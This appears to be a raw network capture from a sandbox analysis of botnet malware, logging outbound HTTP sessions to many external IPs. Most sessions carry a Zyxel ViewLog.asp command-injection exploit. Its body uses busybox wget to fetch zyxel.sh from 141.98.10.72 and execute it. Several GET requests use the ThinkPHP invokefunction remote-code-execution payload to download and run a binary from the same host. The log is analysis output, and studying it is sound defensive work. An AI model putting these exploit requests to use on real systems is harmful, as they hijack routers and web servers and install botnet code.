                                                        Date: Wed, 14 Feb 2024 08:36:12 GMT
                                                        Connection: Close
                                                        Cache-Control: no-store
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: DENY
                                                        Strict-Transport-Security: max-age=4473122; includeSubDomains
                                                        Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *; upgrade-insecure-requests


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1416192.168.2.144590062.29.86.428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.058123112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1417192.168.2.144745294.123.141.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.058161020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1418192.168.2.144676685.122.213.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.358838081 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1419192.168.2.145272495.179.211.1618080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.501313925 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:12.697201967 CET113INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:36:12 GMT
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1420192.168.2.145315631.136.96.148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.527010918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:13.217355967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:14.561295986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1421192.168.2.144439231.136.183.218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.527559042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:13.217339039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:14.561436892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1422192.168.2.145338094.66.4.2188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.542882919 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1423192.168.2.145333894.120.42.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.553461075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1424192.168.2.145781094.121.31.1318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.553528070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1425192.168.2.143756662.29.48.218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.555162907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1426192.168.2.145813062.29.83.908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:12.555247068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1427192.168.2.144415888.165.228.19980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:13.313468933 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1428192.168.2.145140688.99.151.8880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:13.316288948 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:13.525331020 CET295INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:36:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1429192.168.2.143631288.99.242.14180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:13.516561031 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:13.719712019 CET913INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 681
                                                        date: Wed, 14 Feb 2024 08:36:09 GMT
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1430192.168.2.143543288.245.43.14380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:13.756400108 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:14.003612041 CET317INHTTP/1.1 400 Bad Request
                                                        Server: Web server
                                                        Date: Wed, 14 Feb 2024 08:36:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 155
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1431192.168.2.146030488.28.226.12680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:13.774708033 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:14.107480049 CET1286INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39
                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404</h2><p>Problem accessing /index.php. Reason:<pre> Not Found</pre></p><hr /><i><sma
                                                        Feb 14, 2024 09:36:14.107518911 CET112INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 62 72 2f 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: <br/> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1432192.168.2.144666488.237.89.24580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:13.774802923 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1433192.168.2.144967094.2.26.2378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:13.910790920 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1434192.168.2.145678662.72.6.268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.066344976 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1435192.168.2.145738831.136.47.1048080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.128005028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1436192.168.2.145826431.136.198.448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.131232977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
